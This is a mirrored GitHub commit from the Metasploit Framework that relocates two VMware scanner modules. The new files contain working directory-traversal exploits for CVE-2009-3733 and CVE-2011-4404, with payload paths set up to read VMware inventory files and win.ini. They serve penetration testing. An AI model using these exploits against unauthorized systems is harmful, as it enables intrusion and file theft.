github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-02 07:40:19 +02:00
Code Releases Activity

Land #5508, Get Ready to Move VMware modules to the VMware directory

Browse Source
This commit is contained in:
wchen-r7 2015-06-10 11:59:40 -05:00
commit 8dad739c76
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
4 changed files with 162 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
modules/auxiliary/scanner/http/vmware_server_dir_trav.rb
View File

@ -12,6 +12,9 @@ class Metasploit3 < Msf::Auxiliary
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Module::Deprecated
deprecated(Date.new(2015,7,21), 'auxiliary/scanner/vmware/vmware_server_dir_trav')
def initialize
super(

3
modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb
View File

@ -10,6 +10,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Module::Deprecated
deprecated(Date.new(2015,7,21), 'auxiliary/scanner/vmware/vmware_update_manager_traversal')
def initialize(info={})
super(update_info(info,

84
modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb Normal file
View File

@ -0,0 +1,84 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'VMware Server Directory Traversal Vulnerability',
'Description' => 'This modules exploits the VMware Server Directory Traversal
vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before
2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5
allows remote attackers to read arbitrary files. Common VMware server ports
80/8222 and 443/8333 SSL. If you want to download the entire VM, check out
the gueststealer tool.',
'Author' => 'CG' ,
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2009-0015.html' ],
[ 'OSVDB', '59440' ],
[ 'BID', '36842' ],
[ 'CVE', '2009-3733' ],
[ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ]
]
)
register_options(
[
Opt::RPORT(8222),
OptString.new('FILE', [ true, "The file to view", '/etc/vmware/hostd/vmInventory.xml']),
OptString.new('TRAV', [ true, "Traversal Depth", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']),
], self.class)
end
def run_host(target_host)
begin
file = datastore['FILE']
trav = datastore['TRAV']
res = send_request_raw({
'uri' => trav+file,
'version' => '1.1',
'method' => 'GET'
}, 25)
if res.nil?
print_error("Connection timed out")
return
end
if res.code == 200
#print_status("Output Of Requested File:\n#{res.body}")
print_status("#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability")
report_vuln(
{
:host => target_host,
:port => rport,
:proto => 'tcp',
:name => self.name,
:info => "Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}",
:refs => self.references,
:exploited_at => Time.now.utc
}
)
else
vprint_status("Received #{res.code} for #{trav}#{file}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
print_error(e.message)
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end

72
modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb Normal file
View File

@ -0,0 +1,72 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => "VMWare Update Manager 4 Directory Traversal",
'Description' => %q{
This modules exploits a directory traversal vulnerability in VMWare Update Manager
on port 9084. Versions affected by this vulnerability: vCenter Update Manager
4.1 prior to Update 2, vCenter Update Manager 4 Update 4.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alexey Sintsov', #Initial discovery, poc
'sinn3r' #Metasploit
],
'References' =>
[
['CVE', '2011-4404'],
['EDB', '18138'],
['URL', 'http://www.vmware.com/security/advisories/VMSA-2011-0014.html'],
['URL', 'http://dsecrg.com/pages/vul/show.php?id=342']
],
'DisclosureDate' => "Nov 21 2011"))
register_options(
[
Opt::RPORT(9084),
OptString.new('URIPATH', [true, 'URI path to the downloads', '/vci/downloads/']),
OptString.new('FILE', [true, 'Define the remote file to download', 'windows\\win.ini'])
], self.class)
end
def run_host(ip)
fname = File.basename(datastore['FILE'])
traversal = ".\\..\\..\\..\\..\\..\\..\\..\\"
uri = normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE']
print_status("#{rhost}:#{rport} - Requesting: #{uri}")
res = send_request_raw({
'method' => 'GET',
'uri' => uri
}, 25)
# If there's no response, don't bother
if res.nil? or res.body.empty?
print_error("No content retrieved from: #{ip}")
return
end
if res.code == 404
print_error("#{rhost}:#{rport} - File not found")
return
else
print_good("File retrieved from: #{ip}")
p = store_loot("vmware.traversal.file", "application/octet-stream", rhost, res.to_s, fname)
print_status("File stored in: #{p}")
end
end
end